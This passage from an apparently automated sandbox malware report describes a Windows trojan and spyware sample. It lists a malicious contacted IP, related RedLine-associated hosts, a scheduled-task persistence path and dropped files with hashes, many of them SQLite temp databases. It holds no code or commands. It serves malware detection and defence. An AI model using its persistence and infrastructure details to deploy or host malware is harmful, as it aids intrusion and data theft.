                                                                            • URL Reputation: safe
                                                                            		unknown
                                                                            http://ns.adobe.0/xmpDeCiENBY.exe, 00000012.00000002.2079877792.0000000000CFE000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                              		unknown
                                                                              http://schemas.xmlsoap.org/soap/actor/nextPZNfhfaj9O.exe, 00000009.00000002.1975298411.0000000002F91000.00000004.00000800.00020000.00000000.sdmp, CiENBY.exe, 00000012.00000002.2081500546.0000000002841000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              		unknown

                                                                              World Map of Contacted IPs

                                                                              • No. of IPs < 25%
                                                                              • 25% < No. of IPs < 50%
                                                                              • 50% < No. of IPs < 75%
                                                                              • 75% < No. of IPs

                                                                              Public IPs

                                                                              IPDomainCountryFlagASNASN NameMalicious
                                                                              185.222.58.80
                                                                              		unknownNetherlands
                                                                              		51447ROOTLAYERNETNLtrue

                                                                              General Information

                                                                              Joe Sandbox version:41.0.0 Charoite
                                                                              Analysis ID:1532739
                                                                              Start date and time:2024-10-13 21:01:07 +02:00
                                                                              Joe Sandbox product:CloudBasic
                                                                              Overall analysis duration:0h 8m 16s
                                                                              Hypervisor based Inspection enabled:false
                                                                              Report type:full
                                                                              Cookbook file name:default.jbs
                                                                              Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                              Number of analysed new started processes analysed:21
                                                                              Number of new started drivers analysed:0
                                                                              Number of existing processes analysed:0
                                                                              Number of existing drivers analysed:0
                                                                              Number of injected processes analysed:0
                                                                              Technologies:
                                                                              • HCA enabled
                                                                              • EGA enabled
                                                                              • AMSI enabled
                                                                              Analysis Mode:default
                                                                              Analysis stop reason:Timeout
                                                                              Sample name:PZNfhfaj9O.exe
                                                                              renamed because original name is a hash value
                                                                              Original Sample Name:01d452e81b85a3d399a247852f2f5004.exe
                                                                              Detection:MAL
                                                                              Classification:mal100.troj.spyw.evad.winEXE@23/99@2/1
                                                                              EGA Information:
                                                                              • Successful, ratio: 100%
                                                                              HCA Information:
                                                                              • Successful, ratio: 100%
                                                                              • Number of executed functions: 103
                                                                              • Number of non-executed functions: 12
                                                                              Cookbook Comments:
                                                                              • Found application associated with file extension: .exe

                                                                              Warnings

                                                                              • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                              • Excluded IPs from analysis (whitelisted): 172.67.75.172, 104.26.13.31, 104.26.12.31
                                                                              • Excluded domains from analysis (whitelisted): api.ip.sb.cdn.cloudflare.net, fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                              • Not all processes where analyzed, report is missing behavior information
                                                                              • Report size exceeded maximum capacity and may have missing behavior information.
                                                                              • Report size getting too big, too many NtAllocateVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtCreateKey calls found.
                                                                              • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                              • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                              • Report size getting too big, too many NtQueryValueKey calls found.
                                                                              • VT rate limit hit for: PZNfhfaj9O.exe

                                                                              Simulations

                                                                              Behavior and APIs

                                                                              TimeTypeDescription
                                                                              15:02:08API Interceptor40x Sleep call for process: PZNfhfaj9O.exe modified
                                                                              15:02:15API Interceptor37x Sleep call for process: powershell.exe modified
                                                                              15:02:18API Interceptor42x Sleep call for process: CiENBY.exe modified
                                                                              20:02:15Task SchedulerRun new task: CiENBY path: C:\Users\user\AppData\Roaming\CiENBY.exe

                                                                              Joe Sandbox View / Context

                                                                              IPs

                                                                              No context

                                                                              Domains

                                                                              No context

                                                                              ASNs

                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                              ROOTLAYERNETNLZxS8mP8uE6.exeGet hashmaliciousRedLineBrowse
                                                                              • 45.137.22.123
                                                                              nu28HwzQwC.exeGet hashmaliciousRedLineBrowse
                                                                              • 185.222.58.52
                                                                              DKO6uy1Tia.exeGet hashmaliciousRedLineBrowse
                                                                              • 45.137.22.70
                                                                              3BOCQ22aUs.ps1Get hashmaliciousUnknownBrowse
                                                                              • 45.137.20.45
                                                                              Order Proposal.exeGet hashmaliciousRedLineBrowse
                                                                              • 45.137.22.121
                                                                              l2rMtmFkD6.exeGet hashmaliciousRedLineBrowse
                                                                              • 185.222.58.233
                                                                              HJEbEB40vP.exeGet hashmaliciousGuLoaderBrowse
                                                                              • 185.222.58.113
                                                                              PzPxqbK89H.exeGet hashmaliciousRedLineBrowse
                                                                              • 45.137.22.239
                                                                              tfF3UBTdr8.exeGet hashmaliciousRedLineBrowse
                                                                              • 185.222.57.91
                                                                              4Si6dGqcuy.exeGet hashmaliciousRedLineBrowse
                                                                              • 45.137.22.102

                                                                              JA3 Fingerprints

                                                                              No context

                                                                              Dropped Files

                                                                              No context

                                                                              Created / dropped Files

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\CiENBY.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:false
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                              C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\PZNfhfaj9O.exe.log

                                                                              Download File
                                                                              Process:C:\Users\user\Desktop\PZNfhfaj9O.exe
                                                                              File Type:ASCII text, with CRLF line terminators
                                                                              Category:dropped
                                                                              Size (bytes):1216
                                                                              Entropy (8bit):5.34331486778365
                                                                              Encrypted:false
                                                                              SSDEEP:24:MLUE4K5E4KH1qE4qXKDE4KhKiKhPKIE4oKNzKoZAE4Kze0E4x84j:MIHK5HKH1qHiYHKh3oPtHo6hAHKze0HJ
                                                                              MD5:1330C80CAAC9A0FB172F202485E9B1E8
                                                                              SHA1:86BAFDA4E4AE68C7C3012714A33D85D2B6E1A492
                                                                              SHA-256:B6C63ECE799A8F7E497C2A158B1FFC2F5CB4F745A2F8E585F794572B7CF03560
                                                                              SHA-512:75A17AB129FE97BBAB36AA2BD66D59F41DB5AFF44A705EF3E4D094EC5FCD056A3ED59992A0AC96C9D0D40E490F8596B07DCA9B60E606B67223867B061D9D0EB2
                                                                              Malicious:true
                                                                              Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\920e3d1d70447c3c10e69e6df0766568\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\8b2c1203fd20aea8260bfbc518004720\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\2192b0d5aa4aa14486ae08118d3b9fcc\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\2062ed810929ec0e33254c02

                                                                              C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:data
                                                                              Category:dropped
                                                                              Size (bytes):2232
                                                                              Entropy (8bit):5.379401388151058
                                                                              Encrypted:false
                                                                              SSDEEP:48:fWSU4xymI4RfoUeW+gZ9tK8NPZHUxL7u1iMuge//ZPUyuVws:fLHxvIIwLgZ2KRHWLOugbVws
                                                                              MD5:0B4017F125E76F55EAE85EF01D615C8A
                                                                              SHA1:74D2FF2E01213220AD36EEF8CA5CD4FC54DFB23F
                                                                              SHA-256:13EED02E4D9B3CE0C1B223961DEAFB6D1AE7D91878397420DE1916D4F779925C
                                                                              SHA-512:BD7E1EDFB02BCA3A7DB412A8DA17D15F99C6B51F400F8EE195DD45DF9DEB49874CF94160A31BBF08ACC570AEC9973EC568797E00701833521D0C696111DCDFFA
                                                                              Malicious:false
                                                                              Preview:@...e................................................@..........P................1]...E.....j.....(.Microsoft.PowerShell.Commands.ManagementH...............o..b~.D.poM......... .Microsoft.PowerShell.ConsoleHost0......................C.l]..7.s........System..4....................D...{..|f........System.Core.D...............4..7..D.#V.............System.Management.Automation<...............i..VdqF...|...........System.Configuration4.................%...K... ...........System.Xml..L.................*gQ?O.....x5.......#.Microsoft.Management.Infrastructure.<................t.,.lG....M...........System.Management...@................z.U..G...5.f.1........System.DirectoryServices8..................1...L..U;V.<}........System.Numerics.4.....................@.[8]'.\........System.Data.H................WY..2.M.&..g*(g........Microsoft.PowerShell.Security...<...............V.}...@...i...........System.Transactions.P...............8..{...@.e..."4.......%.Microsoft.PowerShell.Com

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_4crtcs5o.3ss.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_5dl3rkda.tzc.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_la3pxgze.1nu.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_lgziukw1.ns2.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_n5fyhhir.eq2.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_syyobi1x.j3r.ps1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_tqpzhywa.cfy.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_uzs012ld.0je.psm1

                                                                              Download File
                                                                              Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                              File Type:ASCII text, with no line terminators
                                                                              Category:dropped
                                                                              Size (bytes):60
                                                                              Entropy (8bit):4.038920595031593
                                                                              Encrypted:false
                                                                              SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                              MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                              SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                              SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                              SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                              Malicious:false
                                                                              Preview:# PowerShell test file to determine AppLocker lockdown mode

                                                                              C:\Users\user\AppData\Local\Temp\tmp16C7.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                              Category:dropped
                                                                              Size (bytes):106496
                                                                              Entropy (8bit):1.1358696453229276
                                                                              Encrypted:false
                                                                              SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6c5/w4:MnlyfnGtxnfVuSVumEH544
                                                                              MD5:28591AA4E12D1C4FC761BE7C0A468622
                                                                              SHA1:BC4968A84C19377D05A8BB3F208FBFAC49F4820B
                                                                              SHA-256:51624D124EFA3EE31EF43CB3D9ECFE98254D629957063747F4CA7061543B14B9
                                                                              SHA-512:5DDC8C36538AB1415637B2FF6C35AED3A94639A0C2B0A36E256A1C4477AA5A356813D1368913BA3B6E8B770625CDCB94EE7BFC17FD7D324982CFE3BDEC2D32EB
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp16E7.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp16F8.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp1708.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp1709.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp171A.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 1, database pages 24, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                              Category:dropped
                                                                              Size (bytes):49152
                                                                              Entropy (8bit):0.8180424350137764
                                                                              Encrypted:false
                                                                              SSDEEP:96:uRMKLyeymwxCn8MZyFlSynlbiXyKwt8hG:uRkxGOXnlbibhG
                                                                              MD5:349E6EB110E34A08924D92F6B334801D
                                                                              SHA1:BDFB289DAFF51890CC71697B6322AA4B35EC9169
                                                                              SHA-256:C9FD7BE4579E4AA942E8C2B44AB10115FA6C2FE6AFD0C584865413D9D53F3B2A
                                                                              SHA-512:2A635B815A5E117EA181EE79305EE1BAF591459427ACC5210D8C6C7E447BE3513EAD871C605EB3D32E4AB4111B2A335F26520D0EF8C1245A4AF44E1FAEC44574
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ ..........................................................................O}....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp24DB.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp24EB.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
                                                                              SHA-512:E422863112084BB8D11C682482E780CD63C2F20C8E3A93ED3B9EFD1B04D53EB5D3C8081851CA89B74D66F3D9AB48EB5F6C74550484F46E7C6E460A8250C9B1D8
                                                                              Malicious:false
                                                                              Preview:SQLite format 3......@ .......8...........$......................................................O}...........4........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                              C:\Users\user\AppData\Local\Temp\tmp250C.tmp

                                                                              Download File
                                                                              Process:C:\Users\user\AppData\Roaming\CiENBY.exe
                                                                              File Type:SQLite 3.x database, last written using SQLite version 3035005, page size 2048, file counter 2, database pages 56, cookie 0x24, schema 4, UTF-8, version-valid-for 2
                                                                              Category:dropped
                                                                              Size (bytes):114688
                                                                              Entropy (8bit):0.9746603542602881
                                                                              Encrypted:false
                                                                              SSDEEP:192:CwbUJ6IH9xhomnGCTjHbRjCLqtzKWJaW:CfJ6a9xpnQLqtzKWJn
                                                                              MD5:780853CDDEAEE8DE70F28A4B255A600B
                                                                              SHA1:AD7A5DA33F7AD12946153C497E990720B09005ED
                                                                              SHA-256:1055FF62DE3DEA7645C732583242ADF4164BDCFB9DD37D9B35BBB9510D59B0A3
